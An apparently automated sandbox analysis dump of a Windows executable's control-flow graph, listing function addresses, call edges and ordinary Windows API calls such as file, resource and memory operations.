39323 409b98 GetFileAttributesW 39298->39323 39300 409634 39301 409648 39300->39301 39324 4091b8 memset 39300->39324 39303 40b2cc 27 API calls 39301->39303 39305 408801 39301->39305 39304 40965d 39303->39304 39306 409d1f 6 API calls 39304->39306 39305->38648 39305->38692 39307 40966d 39306->39307 39376 409b98 GetFileAttributesW 39307->39376 39309 40967c 39309->39305 39310 409681 39309->39310 39377 409529 72 API calls 39310->39377 39312 409690 39312->39305 39313->38670 39314->38692 39315->38675 39316->38692 39317->38680 39323->39300 39378 40a6e6 WideCharToMultiByte 39324->39378 39326 409202 39379 444432 39326->39379 39329 40b273 27 API calls 39330 409236 39329->39330 39425 438552 39330->39425 39333 409383 39335 40b273 27 API calls 39333->39335 39337 409399 39335->39337 39336 409254 39338 40937b 39336->39338 39446 4253cf 17 API calls 39336->39446 39339 438552 133 API calls 39337->39339 39450 424f26 122 API calls 39338->39450 39358 4093a3 39339->39358 39342 409267 39447 4253cf 17 API calls 39342->39447 39343 4094ff 39454 443d90 39343->39454 39346 4251c4 136 API calls 39346->39358 39348 409507 39356 40951d 39348->39356 39474 408f2f 77 API calls 39348->39474 39350 4093df 39453 424f26 122 API calls 39350->39453 39352 4253cf 17 API calls 39352->39358 39356->39301 39358->39343 39358->39346 39358->39350 39358->39352 39360 4093e4 39358->39360 39451 4253af 17 API calls 39360->39451 39366 4093ed 39452 4253af 17 API calls 39366->39452 39369 4093f9 39369->39350 39370 409409 memcmp 39369->39370 39370->39350 39371 409421 memcmp 39370->39371 39372 4094a4 memcmp 39371->39372 39373 409435 39371->39373 39372->39350 39373->39350 39376->39309 39377->39312 39378->39326 39475 4438b5 39379->39475 39381 44444c 39387 409215 39381->39387 39489 415a6d 39381->39489 39384 444486 39386 4444b9 memcpy 39384->39386 39424 4444a4 39384->39424 39385 44469e 39385->39387 39389 443d90 110 API calls 39385->39389 39493 415258 39386->39493 39387->39329 39387->39356 39389->39387 39390 444524 39391 444541 39390->39391 39392 44452a 39390->39392 39496 444316 39391->39496 39530 416935 39392->39530 39396 444316 18 API calls 39397 444563 39396->39397 39398 444316 18 API calls 39397->39398 39399 44456f 39398->39399 39400 444316 18 API calls 39399->39400 39401 44457f 39400->39401 39401->39424 39510 432d4e 39401->39510 39543 4442e6 11 API calls 39424->39543 39544 438460 39425->39544 39427 409240 39427->39333 39428 4251c4 39427->39428 39556 424f07 39428->39556 39430 4251e4 39431 4251f7 39430->39431 39432 4251e8 39430->39432 39564 4250f8 39431->39564 39563 4446ea 11 API calls 39432->39563 39434 4251f2 39434->39336 39436 425209 39439 425249 39436->39439 39442 4250f8 126 API calls 39436->39442 39443 425287 39436->39443 39572 4384e9 134 API calls 39436->39572 39573 424f74 123 API calls 39436->39573 39439->39443 39574 424ff0 13 API calls 39439->39574 39442->39436 39576 415c7d 16 API calls 39443->39576 39446->39342 39450->39333 39451->39366 39452->39369 39453->39343 39455 443da3 39454->39455 39473 443db6 39454->39473 39577 41707a 11 API calls 39455->39577 39457 443da8 39458 443dac 39457->39458 39460 443dbc 39457->39460 39578 4446ea 11 API calls 39458->39578 39579 4300e8 memset memset memcpy 39460->39579 39473->39348 39474->39356 39476 4438d0 39475->39476 39482 4438c9 39475->39482 39477 415378 memcpy memcpy 39476->39477 39478 4438d5 39477->39478 39479 4154e2 10 API calls 39478->39479 39480 443906 39478->39480 39478->39482 39479->39480 39481 443970 memset 39480->39481 39480->39482 39484 44398b 39481->39484 39482->39381 39483 415700 10 API calls 39486 4439c0 39483->39486 39485 41975c 10 API calls 39484->39485 39487 4439a0 39484->39487 39485->39487 39486->39482 39488 418981 10 API calls 39486->39488 39487->39482 39487->39483 39488->39482 39490 415a77 39489->39490 39491 415a8d 39490->39491 39492 415a7e memset 39490->39492 39491->39384 39492->39491 39494 4438b5 11 API calls 39493->39494 39495 41525d 39494->39495 39495->39390 39497 444328 39496->39497 39498 444423 39497->39498 39499 44434e 39497->39499 39500 4446ea 11 API calls 39498->39500 39501 432d4e memset memset memcpy 39499->39501 39507 444381 39500->39507 39502 44435a 39501->39502 39504 444375 39502->39504 39509 44438b 39502->39509 39503 432d4e memset memset memcpy 39505 4443ec 39503->39505 39506 416935 16 API calls 39504->39506 39505->39507 39508 416935 16 API calls 39505->39508 39506->39507 39507->39396 39508->39507 39509->39503 39511 432d58 39510->39511 39513 432d65 39510->39513 39512 432cc4 memset memset memcpy 39511->39512 39512->39513 39531 41693e 39530->39531 39534 41698e 39530->39534 39532 41694c 39531->39532 39533 422fd1 memset 39531->39533 39532->39534 39535 4165a0 11 API calls 39532->39535 39533->39532 39534->39424 39536 416972 39535->39536 39536->39534 39537 422b84 15 API calls 39536->39537 39537->39534 39543->39385 39545 41703f 11 API calls 39544->39545 39546 43847a 39545->39546 39547 43848a 39546->39547 39548 43847e 39546->39548 39550 438270 133 API calls 39547->39550 39549 4446ea 11 API calls 39548->39549 39552 438488 39549->39552 39551 4384aa 39550->39551 39551->39552 39553 424f26 122 API calls 39551->39553 39552->39427 39554 4384bb 39553->39554 39555 438270 133 API calls 39554->39555 39555->39552 39557 424f1f 39556->39557 39558 424f0c 39556->39558 39560 424eea 11 API calls 39557->39560 39559 416760 11 API calls 39558->39559 39561 424f18 39559->39561 39562 424f24 39560->39562 39561->39430 39562->39430 39563->39434 39565 425108 39564->39565 39571 42510d 39564->39571 39566 424f74 123 API calls 39565->39566 39566->39571 39567 42569b 124 API calls 39568 42516e 39567->39568 39570 415c7d 16 API calls 39568->39570 39569 425115 39569->39436 39570->39569 39571->39567 39571->39569 39572->39436 39573->39436 39576->39434 39577->39457 39578->39473 39610 413f4f 39583->39610 39586 413f37 K32GetModuleFileNameExW 39587 413f4a 39586->39587 39587->38708 39589 41396c wcschr 39588->39589 39591 413969 wcscpy 39588->39591 39589->39591 39592 41398e 39589->39592 39593 413a3a 39591->39593 39615 4097f7 wcslen wcslen _memicmp 39592->39615 39593->38708 39595 41399a 39596 4139a4 memset 39595->39596 39597 4139e6 39595->39597 39616 409dd5 GetWindowsDirectoryW wcscpy 39596->39616 39599 413a31 wcscpy 39597->39599 39600 4139ec memset 39597->39600 39599->39593 39617 409dd5 GetWindowsDirectoryW wcscpy 39600->39617 39601 4139c9 wcscpy wcscat 39601->39593 39603 413a11 memcpy wcscat 39603->39593 39605 413cb0 GetModuleHandleW 39604->39605 39606 413cda 39604->39606 39605->39606 39607 413cbf GetProcAddress 39605->39607 39608 413ce3 GetProcessTimes 39606->39608 39609 413cf6 39606->39609 39607->39606 39608->38710 39609->38710 39611 413f2f 39610->39611 39612 413f54 39610->39612 39611->39586 39611->39587 39613 40a804 8 API calls 39612->39613 39614 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39613->39614 39614->39611 39615->39595 39616->39601 39617->39603 39618->38731 39619->38753 39621 409cf9 GetVersionExW 39620->39621 39622 409d0a 39620->39622 39621->39622 39622->38760 39622->38763 39623->38767 39624->38769 39625->38835 39627 40bba5 39626->39627 39674 40cc26 39627->39674 39630 40bd4b 39695 40cc0c 39630->39695 39635 40b2cc 27 API calls 39636 40bbef 39635->39636 39702 40ccf0 _wcsicmp 39636->39702 39638 40bbf5 39638->39630 39703 40ccb4 6 API calls 39638->39703 39640 40bc26 39641 40cf04 17 API calls 39640->39641 39642 40bc2e 39641->39642 39643 40bd43 39642->39643 39644 40b2cc 27 API calls 39642->39644 39645 40cc0c 4 API calls 39643->39645 39646 40bc40 39644->39646 39645->39630 39704 40ccf0 _wcsicmp 39646->39704 39648 40bc46 39648->39643 39649 40bc61 memset memset WideCharToMultiByte 39648->39649 39705 40103c strlen 39649->39705 39651 40bcc0 39652 40b273 27 API calls 39651->39652 39653 40bcd0 memcmp 39652->39653 39653->39643 39654 40bce2 39653->39654 39655 404423 37 API calls 39654->39655 39656 40bd10 39655->39656 39656->39643 39657 40bd3a LocalFree 39656->39657 39658 40bd1f memcpy 39656->39658 39657->39643 39658->39657 39659->38850 39661 409a74 GetTempFileNameW 39660->39661 39662 409a66 GetWindowsDirectoryW 39660->39662 39661->38848 39662->39661 39663->38885 39664->38885 39665->38885 39666->38885 39667->38885 39668->38885 39669->38885 39670->38885 39671->38885 39672->38860 39673->38882 39706 4096c3 CreateFileW 39674->39706 39676 40cc34 39677 40cc3d GetFileSize 39676->39677 39678 40bbca 39676->39678 39679 40afcf 2 API calls 39677->39679 39678->39630 39686 40cf04 39678->39686 39680 40cc64 39679->39680 39707 40a2ef ReadFile 39680->39707 39682 40cc71 39708 40ab4a MultiByteToWideChar 39682->39708 39684 40cc95 CloseHandle 39685 40b04b ??3@YAXPAX 39684->39685 39685->39678 39687 40b633 free 39686->39687 39688 40cf14 39687->39688 39714 40b1ab free free 39688->39714 39690 40bbdd 39690->39630 39690->39635 39691 40cf1b 39691->39690 39693 40cfef 39691->39693 39715 40cd4b 39691->39715 39694 40cd4b 14 API calls 39693->39694 39694->39690 39696 40b633 free 39695->39696 39697 40cc15 39696->39697 39698 40aa04 free 39697->39698 39699 40cc1d 39698->39699 39764 40b1ab free free 39699->39764 39701 40b7d4 memset CreateFileW 39701->38841 39701->38842 39702->39638 39703->39640 39704->39648 39705->39651 39706->39676 39707->39682 39709 40ab6b 39708->39709 39713 40ab93 39708->39713 39710 40a9ce 4 API calls 39709->39710 39711 40ab74 39710->39711 39712 40ab7c MultiByteToWideChar 39711->39712 39712->39713 39713->39684 39714->39691 39716 40cd7b 39715->39716 39749 40aa29 39716->39749 39718 40cef5 39719 40aa04 free 39718->39719 39720 40cefd 39719->39720 39720->39691 39722 40aa29 6 API calls 39723 40ce1d 39722->39723 39724 40aa29 6 API calls 39723->39724 39725 40ce3e 39724->39725 39726 40ce6a 39725->39726 39757 40abb7 wcslen memmove 39725->39757 39727 40ce9f 39726->39727 39760 40abb7 wcslen memmove 39726->39760 39730 40a8d0 7 API calls 39727->39730 39733 40ceb5 39730->39733 39731 40ce56 39758 40aa71 wcslen 39731->39758 39732 40ce8b 39761 40aa71 wcslen 39732->39761 39739 40a8d0 7 API calls 39733->39739 39736 40ce5e 39759 40abb7 wcslen memmove 39736->39759 39737 40ce93 39762 40abb7 wcslen memmove 39737->39762 39741 40cecb 39739->39741 39763 40d00b malloc memcpy free free 39741->39763 39743 40cedd 39744 40aa04 free 39743->39744 39745 40cee5 39744->39745 39746 40aa04 free 39745->39746 39747 40ceed 39746->39747 39748 40aa04 free 39747->39748 39748->39718 39750 40aa33 39749->39750 39756 40aa63 39749->39756 39751 40aa44 39750->39751 39752 40aa38 wcslen 39750->39752 39753 40a9ce malloc memcpy free free 39751->39753 39752->39751 39754 40aa4d 39753->39754 39755 40aa51 memcpy 39754->39755 39754->39756 39755->39756 39756->39718 39756->39722 39757->39731 39758->39736 39759->39726 39760->39732 39761->39737 39762->39727 39763->39743 39764->39701 39765->38900 39766->38908 37675 44dea5 37676 44deb5 FreeLibrary 37675->37676 37677 44dec3 37675->37677 37676->37677 39776 4148b6 FindResourceW 39777 4148cf SizeofResource 39776->39777 39780 4148f9 39776->39780 39778 4148e0 LoadResource 39777->39778 39777->39780 39779 4148ee LockResource 39778->39779 39778->39780 39779->39780 37851 415304 free 39781 441b3f 39791 43a9f6 39781->39791 39783 441b61 39964 4386af memset 39783->39964 39785 44189a 39786 4418e2 39785->39786 39788 442bd4 39785->39788 39787 4418ea 39786->39787 39965 4414a9 12 API calls 39786->39965 39788->39787 39966 441409 memset 39788->39966 39792 43aa20 39791->39792 39793 43aadf 39791->39793 39792->39793 39794 43aa34 memset 39792->39794 39793->39783 39795 43aa56 39794->39795 39796 43aa4d 39794->39796 39967 43a6e7 39795->39967 39975 42c02e memset 39796->39975 39801 43aad3 39977 4169a7 11 API calls 39801->39977 39802 43aaae 39802->39793 39802->39801 39817 43aae5 39802->39817 39803 43ac18 39806 43ac47 39803->39806 39979 42bbd5 memcpy memcpy memcpy memset memcpy 39803->39979 39807 43aca8 39806->39807 39980 438eed 16 API calls 39806->39980 39810 43acd5 39807->39810 39982 4233ae 11 API calls 39807->39982 39983 423426 11 API calls 39810->39983 39811 43ac87 39981 4233c5 16 API calls 39811->39981 39815 43ace1 39984 439811 162 API calls 39815->39984 39816 43a9f6 160 API calls 39816->39817 39817->39793 39817->39803 39817->39816 39978 439bbb 22 API calls 39817->39978 39819 43acfd 39824 43ad2c 39819->39824 39985 438eed 16 API calls 39819->39985 39821 43ad19 39986 4233c5 16 API calls 39821->39986 39822 43ad58 39987 44081d 162 API calls 39822->39987 39824->39822 39828 43add9 39824->39828 39827 43ae3a memset 39829 43ae73 39827->39829 39828->39828 39991 423426 11 API calls 39828->39991 39992 42e1c0 146 API calls 39829->39992 39830 43adab 39989 438c4e 162 API calls 39830->39989 39833 43ad6c 39833->39793 39833->39830 39988 42370b memset memcpy memset 39833->39988 39835 43adcc 39990 440f84 12 API calls 39835->39990 39836 43ae96 39993 42e1c0 146 API calls 39836->39993 39839 43aea8 39840 43aec1 39839->39840 39994 42e199 146 API calls 39839->39994 39841 43af00 39840->39841 39995 42e1c0 146 API calls 39840->39995 39841->39793 39845 43af1a 39841->39845 39846 43b3d9 39841->39846 39996 438eed 16 API calls 39845->39996 39852 43b3f6 39846->39852 39854 43b4c8 39846->39854 39848 43b60f 39848->39793 40055 4393a5 17 API calls 39848->40055 39850 43af2f 39997 4233c5 16 API calls 39850->39997 40037 432878 12 API calls 39852->40037 39853 43af51 39998 423426 11 API calls 39853->39998 39856 43b4f2 39854->39856 40043 42bbd5 memcpy memcpy memcpy memset memcpy 39854->40043 40044 43a76c 21 API calls 39856->40044 39858 43af7d 39999 423426 11 API calls 39858->39999 39862 43b529 40045 44081d 162 API calls 39862->40045 39863 43b462 40039 423330 11 API calls 39863->40039 39864 43af94 40000 423330 11 API calls 39864->40000 39868 43afca 40001 423330 11 API calls 39868->40001 39869 43b47e 39873 43b497 39869->39873 40040 42374a memcpy memset memcpy memcpy memcpy 39869->40040 39870 43b544 39874 43b55c 39870->39874 40046 42c02e memset 39870->40046 39871 43b428 39871->39863 40038 432b60 16 API calls 39871->40038 40041 4233ae 11 API calls 39873->40041 40047 43a87a 162 API calls 39874->40047 39875 43afdb 40002 4233ae 11 API calls 39875->40002 39881 43b56c 39884 43b58a 39881->39884 40048 423330 11 API calls 39881->40048 39882 43b4b1 40042 423399 11 API calls 39882->40042 39883 43afee 40003 44081d 162 API calls 39883->40003 40049 440f84 12 API calls 39884->40049 39886 43b4c1 40051 42db80 162 API calls 39886->40051 39891 43b592 40050 43a82f 16 API calls 39891->40050 39894 43b5b4 40052 438c4e 162 API calls 39894->40052 39896 43b5cf 40053 42c02e memset 39896->40053 39898 43b005 39898->39793 39902 43b01f 39898->39902 40004 42d836 162 API calls 39898->40004 39899 43b1ef 40014 4233c5 16 API calls 39899->40014 39902->39899 40012 423330 11 API calls 39902->40012 40013 42d71d 162 API calls 39902->40013 39903 43b212 40015 423330 11 API calls 39903->40015 39904 43b087 40005 4233ae 11 API calls 39904->40005 39905 43add4 39905->39848 40054 438f86 16 API calls 39905->40054 39909 43b22a 40016 42ccb5 11 API calls 39909->40016 39912 43b23f 40017 4233ae 11 API calls 39912->40017 39913 43b10f 40008 423330 11 API calls 39913->40008 39915 43b257 40018 4233ae 11 API calls 39915->40018 39919 43b129 40009 4233ae 11 API calls 39919->40009 39920 43b26e 40019 4233ae 11 API calls 39920->40019 39923 43b09a 39923->39913 40006 42cc15 19 API calls 39923->40006 40007 4233ae 11 API calls 39923->40007 39924 43b282 40020 43a87a 162 API calls 39924->40020 39926 43b13c 40010 440f84 12 API calls 39926->40010 39928 43b29d 40021 423330 11 API calls 39928->40021 39931 43b15f 40011 4233ae 11 API calls 39931->40011 39932 43b2af 39934 43b2b8 39932->39934 39935 43b2ce 39932->39935 40022 4233ae 11 API calls 39934->40022 40023 440f84 12 API calls 39935->40023 39938 43b2c9 40025 4233ae 11 API calls 39938->40025 39939 43b2da 40024 42370b memset memcpy memset 39939->40024 39942 43b2f9 40026 423330 11 API calls 39942->40026 39944 43b30b 40027 423330 11 API calls 39944->40027 39946 43b325 40028 423399 11 API calls 39946->40028 39948 43b332 40029 4233ae 11 API calls 39948->40029 39950 43b354 40030 423399 11 API calls 39950->40030 39952 43b364 40031 43a82f 16 API calls 39952->40031 39954 43b370 40032 42db80 162 API calls 39954->40032 39956 43b380 40033 438c4e 162 API calls 39956->40033 39958 43b39e 40034 423399 11 API calls 39958->40034 39960 43b3ae 40035 43a76c 21 API calls 39960->40035 39962 43b3c3 40036 423399 11 API calls 39962->40036 39964->39785 39965->39787 39966->39788 39968 43a6f5 39967->39968 39969 43a765 39967->39969 39968->39969 40056 42a115 39968->40056 39969->39793 39976 4397fd memset 39969->39976 39973 43a73d 39973->39969 39974 42a115 146 API calls 39973->39974 39974->39969 39975->39795 39976->39802 39977->39793 39978->39817 39979->39806 39980->39811 39981->39807 39982->39810 39983->39815 39984->39819 39985->39821 39986->39824 39987->39833 39988->39830 39989->39835 39990->39905 39991->39827 39992->39836 39993->39839 39994->39840 39995->39840 39996->39850 39997->39853 39998->39858 39999->39864 40000->39868 40001->39875 40002->39883 40003->39898 40004->39904 40005->39923 40006->39923 40007->39923 40008->39919 40009->39926 40010->39931 40011->39902 40012->39902 40013->39902 40014->39903 40015->39909 40016->39912 40017->39915 40018->39920 40019->39924 40020->39928 40021->39932 40022->39938 40023->39939 40024->39938 40025->39942 40026->39944 40027->39946 40028->39948 40029->39950 40030->39952 40031->39954 40032->39956 40033->39958 40034->39960 40035->39962 40036->39905 40037->39871 40038->39863 40039->39869 40040->39873 40041->39882 40042->39886 40043->39856 40044->39862 40045->39870 40046->39874 40047->39881 40048->39884 40049->39891 40050->39886 40051->39894 40052->39896 40053->39905 40054->39848 40055->39793 40057 42a175 40056->40057 40059 42a122 40056->40059 40057->39969 40062 42b13b 146 API calls 40057->40062 40059->40057 40060 42a115 146 API calls 40059->40060 40063 43a174 40059->40063 40087 42a0a8 146 API calls 40059->40087 40060->40059 40062->39973 40077 43a196 40063->40077 40078 43a19e 40063->40078 40064 43a306 40064->40077 40107 4388c4 14 API calls 40064->40107 40067 42a115 146 API calls 40067->40078 40069 43a642 40069->40077 40111 4169a7 11 API calls 40069->40111 40073 43a635 40110 42c02e memset 40073->40110 40077->40059 40078->40064 40078->40067 40078->40077 40088 42ff8c 40078->40088 40096 415a91 40078->40096 40100 4165ff 40078->40100 40103 439504 13 API calls 40078->40103 40104 4312d0 146 API calls 40078->40104 40105 42be4c memcpy memcpy memcpy memset memcpy 40078->40105 40106 43a121 11 API calls 40078->40106 40080 42bf4c 14 API calls 40082 43a325 40080->40082 40081 4169a7 11 API calls 40081->40082 40082->40069 40082->40073 40082->40077 40082->40080 40082->40081 40083 42b5b5 memset memcpy 40082->40083 40086 4165ff 11 API calls 40082->40086 40108 42b63e 14 API calls 40082->40108 40109 42bfcf memcpy 40082->40109 40083->40082 40086->40082 40087->40059 40112 43817e 40088->40112 40090 42ff9d 40090->40078 40091 42ff99 40091->40090 40092 42ffe3 40091->40092 40093 42ffd0 40091->40093 40117 4169a7 11 API calls 40092->40117 40116 4169a7 11 API calls 40093->40116 40097 415a9d 40096->40097 40098 415ab3 40097->40098 40099 415aa4 memset 40097->40099 40098->40078 40099->40098 40268 4165a0 40100->40268 40103->40078 40104->40078 40105->40078 40106->40078 40107->40082 40108->40082 40109->40082 40110->40069 40111->40077 40113 438187 40112->40113 40115 438192 40112->40115 40118 4380f6 40113->40118 40115->40091 40116->40090 40117->40090 40120 43811f 40118->40120 40119 438164 40119->40115 40120->40119 40123 437e5e 40120->40123 40146 4300e8 memset memset memcpy 40120->40146 40147 437d3c 40123->40147 40125 437eb3 40125->40120 40126 437ea9 40126->40125 40132 437f22 40126->40132 40162 41f432 40126->40162 40129 437f06 40209 415c56 11 API calls 40129->40209 40130 437f7f 40133 437f95 40130->40133 40136 43802b 40130->40136 40132->40130 40134 432d4e 3 API calls 40132->40134 40210 415c56 11 API calls 40133->40210 40134->40130 40137 4165ff 11 API calls 40136->40137 40138 438054 40137->40138 40173 437371 40138->40173 40141 43806b 40142 438094 40141->40142 40211 42f50e 137 API calls 40141->40211 40144 437fa3 40142->40144 40212 4300e8 memset memset memcpy 40142->40212 40144->40125 40213 41f638 103 API calls 40144->40213 40146->40120 40148 437d69 40147->40148 40151 437d80 40147->40151 40214 437ccb 11 API calls 40148->40214 40150 437d76 40150->40126 40151->40150 40152 437da3 40151->40152 40153 437d90 40151->40153 40155 438460 133 API calls 40152->40155 40153->40150 40218 437ccb 11 API calls 40153->40218 40158 437dcb 40155->40158 40156 437de8 40217 424f26 122 API calls 40156->40217 40158->40156 40215 444283 13 API calls 40158->40215 40160 437dfc 40216 437ccb 11 API calls 40160->40216 40163 41f54d 40162->40163 40169 41f44f 40162->40169 40164 41f466 40163->40164 40248 41c635 memset memset 40163->40248 40164->40129 40164->40132 40169->40164 40171 41f50b 40169->40171 40219 41f1a5 40169->40219 40244 41c06f memcmp 40169->40244 40245 41f3b1 89 API calls 40169->40245 40246 41f398 85 API calls 40169->40246 40171->40163 40171->40164 40247 41c295 85 API calls 40171->40247 40249 41703f 40173->40249 40175 437399 40176 43739d 40175->40176 40178 4373ac 40175->40178 40256 4446ea 11 API calls 40176->40256 40179 416935 16 API calls 40178->40179 40180 4373ca 40179->40180 40182 438460 133 API calls 40180->40182 40186 4251c4 136 API calls 40180->40186 40190 415a91 memset 40180->40190 40193 43758f 40180->40193 40205 437584 40180->40205 40208 437d3c 134 API calls 40180->40208 40257 425433 13 API calls 40180->40257 40258 425413 17 API calls 40180->40258 40259 42533e 16 API calls 40180->40259 40260 42538f 16 API calls 40180->40260 40261 42453e 122 API calls 40180->40261 40181 4375bc 40264 415c7d 16 API calls 40181->40264 40182->40180 40185 4375d2 40207 4373a7 40185->40207 40265 4442e6 11 API calls 40185->40265 40186->40180 40188 4375e2 40188->40207 40266 444283 13 API calls 40188->40266 40190->40180 40262 42453e 122 API calls 40193->40262 40194 4375f4 40199 437620 40194->40199 40200 43760b 40194->40200 40198 43759f 40201 416935 16 API calls 40198->40201 40203 416935 16 API calls 40199->40203 40267 444283 13 API calls 40200->40267 40201->40205 40203->40207 40205->40181 40263 42453e 122 API calls 40205->40263 40206 437612 memcpy 40206->40207 40207->40141 40208->40180 40209->40125 40210->40144 40211->40142 40212->40144 40213->40125 40214->40150 40215->40160 40216->40156 40217->40150 40218->40150 40220 41bc3b 100 API calls 40219->40220 40221 41f1b4 40220->40221 40222 41edad 85 API calls 40221->40222 40229 41f282 40221->40229 40223 41f1cb 40222->40223 40224 41f1f5 memcmp 40223->40224 40225 41f20e 40223->40225 40223->40229 40224->40225 40226 41f21b memcmp 40225->40226 40225->40229 40227 41f326 40226->40227 40230 41f23d 40226->40230 40228 41ee6b 85 API calls 40227->40228 40227->40229 40228->40229 40229->40169 40230->40227 40231 41f28e memcmp 40230->40231 40233 41c8df 55 API calls 40230->40233 40231->40227 40232 41f2a9 40231->40232 40232->40227 40235 41f308 40232->40235 40236 41f2d8 40232->40236 40234 41f269 40233->40234 40234->40227 40237 41f287 40234->40237 40238 41f27a 40234->40238 40235->40227 40242 4446ce 11 API calls 40235->40242 40239 41ee6b 85 API calls 40236->40239 40237->40231 40240 41ee6b 85 API calls 40238->40240 40241 41f2e0 40239->40241 40240->40229 40243 41b1ca memset 40241->40243 40242->40227 40243->40229 40244->40169 40245->40169 40246->40169 40247->40163 40248->40164 40250 417044 40249->40250 40251 41705c 40249->40251 40253 416760 11 API calls 40250->40253 40255 417055 40250->40255 40252 417075 40251->40252 40254 41707a 11 API calls 40251->40254 40252->40175 40253->40255 40254->40250 40255->40175 40256->40207 40257->40180 40258->40180 40259->40180 40260->40180 40261->40180 40262->40198 40263->40181 40264->40185 40265->40188 40266->40194 40267->40206 40273 415cfe 40268->40273 40277 415d23 __aullrem __aulldvrm 40273->40277 40280 41628e 40273->40280 40274 4163ca 40287 416422 11 API calls 40274->40287 40276 416172 memset 40276->40277 40277->40274 40277->40276 40278 416422 10 API calls 40277->40278 40279 415cb9 10 API calls 40277->40279 40277->40280 40278->40277 40279->40277 40281 416520 40280->40281 40282 416527 40281->40282 40286 416574 40281->40286 40284 416544 40282->40284 40282->40286 40288 4156aa 11 API calls 40282->40288 40285 416561 memcpy 40284->40285 40284->40286 40285->40286 40286->40078 40287->40280 40288->40284 40310 41493c EnumResourceNamesW 37679 4287c1 37680 4287d2 37679->37680 37681 429ac1 37679->37681 37682 428818 37680->37682 37683 42881f 37680->37683 37703 425711 37680->37703 37693 425ad6 37681->37693 37749 415c56 11 API calls 37681->37749 37716 42013a 37682->37716 37744 420244 96 API calls 37683->37744 37687 4260dd 37743 424251 119 API calls 37687->37743 37689 4259da 37742 416760 11 API calls 37689->37742 37694 429a4d 37699 429a66 37694->37699 37700 429a9b 37694->37700 37697 422aeb memset memcpy memcpy 37697->37703 37745 415c56 11 API calls 37699->37745 37702 429a96 37700->37702 37747 416760 11 API calls 37700->37747 37748 424251 119 API calls 37702->37748 37703->37681 37703->37689 37703->37694 37703->37697 37704 4260a1 37703->37704 37712 4259c2 37703->37712 37715 425a38 37703->37715 37732 4227f0 memset memcpy 37703->37732 37733 422b84 15 API calls 37703->37733 37734 422b5d memset memcpy memcpy 37703->37734 37735 422640 13 API calls 37703->37735 37737 4241fc 11 API calls 37703->37737 37738 42413a 89 API calls 37703->37738 37741 415c56 11 API calls 37704->37741 37705 429a7a 37746 416760 11 API calls 37705->37746 37712->37693 37736 415c56 11 API calls 37712->37736 37715->37712 37739 422640 13 API calls 37715->37739 37740 4226e0 12 API calls 37715->37740 37717 42014c 37716->37717 37720 420151 37716->37720 37759 41e466 96 API calls 37717->37759 37719 420162 37719->37703 37720->37719 37721 4201b3 37720->37721 37722 420229 37720->37722 37723 4201b8 37721->37723 37724 4201dc 37721->37724 37722->37719 37725 41fd5e 85 API calls 37722->37725 37750 41fbdb 37723->37750 37724->37719 37729 4201ff 37724->37729 37756 41fc4c 37724->37756 37725->37719 37729->37719 37731 42013a 96 API calls 37729->37731 37731->37719 37732->37703 37733->37703 37734->37703 37735->37703 37736->37689 37737->37703 37738->37703 37739->37715 37740->37715 37741->37689 37742->37687 37743->37693 37744->37703 37745->37705 37746->37702 37747->37702 37748->37681 37749->37689 37751 41fbf8 37750->37751 37754 41fbf1 37750->37754 37764 41ee26 37751->37764 37755 41fc39 37754->37755 37774 4446ce 11 API calls 37754->37774 37755->37719 37760 41fd5e 37755->37760 37757 41ee6b 85 API calls 37756->37757 37758 41fc5d 37757->37758 37758->37724 37759->37720 37762 41fd65 37760->37762 37761 41fdab 37761->37719 37762->37761 37763 41fbdb 85 API calls 37762->37763 37763->37762 37765 41ee41 37764->37765 37766 41ee32 37764->37766 37775 41edad 37765->37775 37778 4446ce 11 API calls 37766->37778 37769 41ee3c 37769->37754 37772 41ee58 37772->37769 37780 41ee6b 37772->37780 37774->37755 37784 41be52 37775->37784 37778->37769 37779 41eb85 11 API calls 37779->37772 37781 41ee70 37780->37781 37782 41ee78 37780->37782 37837 41bf99 85 API calls 37781->37837 37782->37769 37785 41be6f 37784->37785 37786 41be5f 37784->37786 37792 41be8c 37785->37792 37816 418c63 memset memset 37785->37816 37815 4446ce 11 API calls 37786->37815 37788 41be69 37788->37769 37788->37779 37790 41bee7 37790->37788 37820 41a453 85 API calls 37790->37820 37792->37788 37792->37790 37793 41bf3a 37792->37793 37794 41bed1 37792->37794 37819 4446ce 11 API calls 37793->37819 37796 41bef0 37794->37796 37799 41bee2 37794->37799 37796->37790 37797 41bf01 37796->37797 37798 41bf24 memset 37797->37798 37800 41bf14 37797->37800 37817 418a6d memset memcpy memset 37797->37817 37798->37788 37805 41ac13 37799->37805 37818 41a223 memset memcpy memset 37800->37818 37804 41bf20 37804->37798 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37821 41dc14 19 API calls 37806->37821 37808 41acd9 37807->37808 37808->37790 37812 41aca1 37810->37812 37822 41519d 37810->37822 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 37813->37808 37814->37808 37815->37788 37816->37792 37817->37800 37818->37804 37819->37790 37821->37810 37825 4175ed 37822->37825 37833 417570 SetFilePointer 37825->37833 37828 41760a ReadFile 37830 417637 37828->37830 37831 417627 GetLastError 37828->37831 37829 4151b3 37829->37812 37830->37829 37832 41763e memset 37830->37832 37831->37829 37832->37829 37834 4175b2 37833->37834 37835 41759c GetLastError 37833->37835 37834->37828 37834->37829 37835->37834 37836 4175a8 GetLastError 37835->37836 37836->37834 37837->37782 37838 417bc5 37840 417c61 37838->37840 37844 417bda 37838->37844 37839 417bf6 UnmapViewOfFile CloseHandle 37839->37839 37839->37844 37842 417c2c 37842->37844 37850 41851e 18 API calls 37842->37850 37844->37839 37844->37840 37844->37842 37845 4175b7 37844->37845 37846 4175d6 CloseHandle 37845->37846 37847 4175c8 37846->37847 37848 4175df 37846->37848 37847->37848 37849 4175ce Sleep 37847->37849 37848->37844 37849->37846 37850->37842 39767 4147f3 39770 414561 39767->39770 39769 414813 39771 41456d 39770->39771 39772 41457f GetPrivateProfileIntW 39770->39772 39775 4143f1 memset _itow WritePrivateProfileStringW 39771->39775 39772->39769 39774 41457a 39774->39769 39775->39774

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
